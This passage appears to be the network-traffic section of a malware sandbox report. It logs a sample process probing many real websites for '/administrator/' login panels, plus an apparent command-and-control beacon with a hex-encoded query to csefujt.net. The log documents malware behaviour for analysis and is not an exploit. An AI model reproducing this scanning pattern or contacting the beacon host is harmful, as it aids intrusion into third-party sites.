                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.120822906 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.223073959 CET225INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                148192.168.2.652173185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.461612940 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.707020044 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                149192.168.2.65500831.13.65.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.464519978 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: es-la.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.566416979 CET216INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://es-la.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.351864100 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: es-la.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.453955889 CET220INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://es-la.facebook.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                150192.168.2.655013184.25.164.10380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.479259968 CET186OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.664153099 CET351INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.136838913 CET195OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.313245058 CET360INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                151192.168.2.655009104.22.74.22080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.482208967 CET177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.609949112 CET348INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/administrator/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb69debdb171-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.188359976 CET186OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.314400911 CET357INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd430b8ab171-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                152192.168.2.655011104.26.8.1780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.490895987 CET171OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: rage.mp
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.621308088 CET688INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://rage.mp/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x8wZDHWd%2FjV4U8JlElkcvHnRRQk7h5JegXSbOG3MgAODNXY4Mwh8K5wU8TdwaXgYBQUUZwWPZUK91j7OIgVnLQ9BQyThRypFSFmjqlHCpp%2FLN6qY%2BxSrAi0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb69ee14b0a5-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.186460972 CET180OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: rage.mp
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.315474033 CET697INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://rage.mp/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MQdk3RG6CnPapng504S0C%2BAPzfTr5CI5bUySOXClwqsa%2BoqRwmt8fYHB%2F0wxDXMxL95A2DFEQQutHQ7sKbsUoHeKeJfeTE8Cjm02qFwhTUdRt86SdjNE3n8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42fc36b0a5-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                153192.168.2.654998201.134.41.6180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.493994951 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.665334940 CET578INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 345
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 2f 61 63 61 64 65 6d 69 63 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/administrator/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                154192.168.2.65505334.149.46.13080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.538311005 CET185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.647305965 CET214INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.160037994 CET194OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.262521029 CET223INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                155192.168.2.65501044.233.131.11580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553921938 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.729840040 CET389INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://cloud.simplify3d.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                156192.168.2.654755164.100.128.1580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553957939 CET181OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.955607891 CET144INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://upsconline.nic.in/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.657741070 CET190OUTGET /administrator/index.php HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:59.058626890 CET153INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://upsconline.nic.in/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                157192.168.2.655061104.21.14.24580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.577537060 CET178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.705064058 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bosBlvmz7%2FxBQMu7rQ0ihtXGjC718i6u7IWII4cL%2FyHhNG2lxGf1AlBQmsK9CBd3GCoim8Syq8Rhc8XzqZx24f%2BT9rYBbgTKZnjdFs2UEFi7Cdi2Wxr9uJuNXgPWS2bY7w%3D%3D"}],"group":"cf-nel","max_age":604800}
